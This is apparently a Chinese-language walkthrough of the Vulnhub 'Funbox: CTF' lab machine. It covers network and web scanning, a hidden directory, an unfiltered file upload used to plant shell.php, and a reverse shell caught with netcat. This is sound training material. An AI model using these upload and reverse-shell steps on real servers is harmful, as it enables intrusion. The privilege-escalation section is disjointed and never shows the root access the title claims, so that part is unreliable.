Vulnhub之Funbox 4靶机详细测试过程(提权成功)
Funbox 4靶机信息
名称:Funbox: CTF
URL:
https://www.vulnhub.com/entry/funbox-ctf,546/识别靶机IP地址
将靶机导入 VirtualBox。配置其网卡为主机模式配置。启动 Kali Linux 和靶机。
内置 netdiscovery工具 可以将靶机的 IP 地址识别为 192.168.56.150。
(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count LenMAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60Unknown vendor
192.168.56.10008:00:27:4e:f4:34 1 60PCS Systemtechnik GmbH
192.168.56.15008:00:27:4e:a2:f4 1 60PCS Systemtechnik GmbH NMAP 扫描
利用NMAP工具进行全端口扫描:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.150 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-06 02:45 EDT
Nmap scan report for bogon (192.168.56.150)
Host is up (0.00024s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcpopenssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f6:b3:8f:f1:e3:b7:6c:18:ee:31:22:d3:d4:c9:5f:e6 (RSA)
| 256 45:c2:16:fc:3e:a9:fc:32:fc:36:fb:d7:ce:4f:2b:fe (ECDSA)
|_256 4f:f8:46:72:22:9f:d3:10:51:9c:49:e0:76:5f:25:33 (ED25519)
80/tcpopenhttp Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp openpop3 Dovecot pop3d
|_pop3-capabilities: PIPELINING AUTH-RESP-CODE UIDL TOP SASL CAPA RESP-CODES
143/tcp openimap Dovecot imapd
|_imap-capabilities: have SASL-IR capabilities LOGIN-REFERRALS IDLE ENABLE post-login OK LITERAL+ Pre-login listed ID more LOGINDISABLEDA0001 IMAP4rev1
MAC Address: 08:00:27:4E:A2:F4 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.70 secondsNMAP扫描结果表明目标主机有4个开放端口:
22(ssh),80(http),110(pop3),143(imap)
获得Shell
└─$ nikto -h http://192.168.56.150
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.150
+ Target Hostname: 192.168.56.150
+ Target Port: 80
+ Start Time: 2023-05-06 02:46:11 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2c39, size: 5ae05b2177aa4, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2023-05-06 02:47:07 (GMT-4) (56 seconds)
---------------------------------------------------------------------------其实作者给出了一个提示,即本靶机nikto时区分大小写。虽然/robots.txt文件不存在,看可测试大写字母的ROBOTS.TXT是否存在。
──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ curl http://192.168.56.150/ROBOTS.TXT
Disallow: upload/
Disallow: igmseklhgmrjmtherij2145236┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ curl http://192.168.56.150/igmseklhgmrjmtherij2145236/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /igmseklhgmrjmtherij2145236/
on this server.<br />
</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.56.150 Port 80</address>
</body></html>但是访问 igmseklhgmrjmtherij2145236 返回 forbidden的信息,因此可能该目录下存在子目录或者文件,继续用gobuster工具扫描.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ gobuster dir -u http://192.168.56.150/igmseklhgmrjmtherij2145236/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.bak,.js,.txt,.sh
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.150/igmseklhgmrjmtherij2145236/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php,html,bak,js,txt,sh
[+] Timeout: 10s
===============================================================
2023/05/06 03:04:36 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403)
/.php (Status: 403)
/upload.html (Status: 200)
/upload (Status: 301) [--> http://192.168.56.150/igmseklhgmrjmtherij2145236/upload/]
/upload.php (Status: 200)
Progress: 11663 / 1543927 (0.76%)^C
[!] Keyboard interrupt detected, terminating.上述目录下发现了/upload子目录以及upload.php 文件,后者允许我们上传文件,而且没有任何过滤机制,因此接下来就是上次shell.php文件,但是该文件放在什么位置呢,注意到有/upload子目录,可能在该子目录下,经访问验证了这一点:
http://192.168.56.150/igmseklhgmrjmtherij2145236/upload/shell.php在Kali Linux上成功得到了目标主机反弹回来的shell.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ sudo nc -nlvp 5555
password for kali:
listening on 5555 ...
connect to from (UNKNOWN) 48272
Linux funbox4 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
09:08:17 up 26 min,0 users,load average: 1.13, 1.81, 2.70
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@funbox4:/$ cd /home
cd /home
www-data@funbox4:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x4 root root 4.0K Aug 292020 .
drwxr-xr-x 23 root root 4.0K May6 09:07 ..
drwx------4 anna anna 4.0K Aug 302020 anna
drwxr-xr-x4 thomas thomas 4.0K Aug 302020 thomas
www-data@funbox4:/home$ cd anna
cd anna
bash: cd: anna: Permission denied
www-data@funbox4:/home$ cd thomas
cd thomas
www-data@funbox4:/home/thomas$ ls -alh
ls -alh
total 3.0M
drwxr-xr-x 4 thomas thomas 4.0K Aug 302020 .
drwxr-xr-x 4 root root 4.0K Aug 292020 ..
-rw------- 1 thomas thomas 46 Aug 302020 .bash_history
-rw-r--r-- 1 thomas thomas220 Aug 292020 .bash_logout
-rw-r--r-- 1 thomas thomas 3.7K Aug 292020 .bashrc
drwx------ 2 thomas thomas 4.0K Aug 292020 .cache
-rw-r--r-- 1 thomas thomas675 Aug 292020 .profile
drwx------ 2 thomas thomas 4.0K Aug 302020 .ssh
-rw-r--r-- 1 thomas thomas195 Aug 292020 .todo
-rw------- 1 thomas thomas 1.3K Aug 302020 .viminfo
-rw-rw-r-- 1 thomas thomas217 Aug 302020 .wget-hsts
-rwx------ 1 thomas thomas 3.0M Aug 222019 pspy64Privilege Escalation
www-data@funbox4:/$ cat hint.txt
cat hint.txt
The OS beard ist whiter and longer as Gandalfs one !
Perhaps, its possible to get root from here.
I doesnt look forward to see this in the writeups/walktroughs,
but this is murpys law !
Now, rockyou.txt isnt your friend. Its a little sed harder :-)
If you need more brainfuck: Take this:
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>++++++++++++++.>++++.---.<<++.>>+++++++++.---------.+++++++++++++++++++.----.<<.>>------------.+.+++++.++++++.<<.>>-----------.++++++++++.<<.>>-------.+++.------------.--.+++++++++++++++++++.---------------.-.<<.>>+++++.+++++.<<++++++++++++++++++++++++++.
Bit more ?
Tm8gaGludHMgaGVyZSAhCg==
Not enough ?
KNSWC4TDNAQGM33SEB2G6ZDPOMXA====在目标主机shell中执行载荷,然后利用suggester模块定位合适的提权模块
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>++++++++++++++.>++++.---.<<++.>>+++++++++.---------.+++++++++++++++++++.----.<<.>>------------.+.+++++.++++++.<<.>>-----------.++++++++++.<<.>>-------.+++.------------.--.+++++++++++++++++++.---------------.-.<<.>>+++++.+++++.<<++++++++++++++++++++++++++.https://www.splitbrain.org/services/ook
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]